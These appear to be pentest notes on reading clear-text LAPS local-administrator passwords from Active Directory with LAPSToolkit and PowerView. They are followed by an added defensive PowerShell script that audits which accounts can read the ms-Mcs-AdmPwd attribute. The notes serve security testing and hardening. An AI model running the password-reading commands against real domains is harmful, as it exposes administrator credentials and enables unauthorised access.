Local Administrator Password Solution (LAPS)
Try to obtain clear-text passwords from AD when LAPS is in use
Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers
Check the members of the LAPS Password Readers group, as below, to see who has read permission on the clear-text passwords of the computers listed above
Find-LAPSDelegatedGroups
Get-NetGroupMember -GroupName "LAPS Password Readers"
. .\Powerview.ps1
Get-DomainComputer -Identity {target} -Properties ms-Mcs-AdmPwd
Log in as one of the listed accounts on the victim computer and run the first set of commands to see the Password column for the local admin of the corresponding computer hosts.
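The delegation checked above can also be reviewed from the defender's side. The following is an added example, not part of the original notes: it lists every principal holding the extended right to read ms-Mcs-AdmPwd on each OU and reports those outside an allow-list. It assumes the RSAT ActiveDirectory module and the legacy LAPS AdmPwd.PS module are installed; the CONTOSO names in the allow-list are placeholders.

```powershell
# Added example: audit who can read the LAPS password attribute, per OU.
# Assumes the ActiveDirectory (RSAT) and AdmPwd.PS (legacy LAPS) modules.
Import-Module ActiveDirectory
Import-Module AdmPwd.PS

# Placeholder allow-list: replace with the principals that are
# expected to read LAPS passwords in your own domain.
$Approved = @(
    'NT AUTHORITY\SYSTEM',
    'CONTOSO\Domain Admins',
    'CONTOSO\LAPS Password Readers'
)

$findings = foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
    # Returns the OU DN and the principals holding "All extended rights",
    # which is what allows reading the confidential ms-Mcs-AdmPwd attribute.
    $rights = Find-AdmPwdExtendedRights -Identity $ou.DistinguishedName

    foreach ($entry in $rights) {
        foreach ($holder in $entry.ExtendedRightHolders) {
            # -notcontains is case-insensitive for strings
            if ($Approved -notcontains $holder) {
                [pscustomobject]@{
                    OU        = $entry.ObjectDN
                    Principal = $holder
                }
            }
        }
    }
}

# One row per unexpected (OU, principal) pair
$findings | Sort-Object OU, Principal -Unique | Format-Table -AutoSize
```

Each row is a principal whose read access should be removed or justified; membership of the approved groups still needs to be reviewed separately.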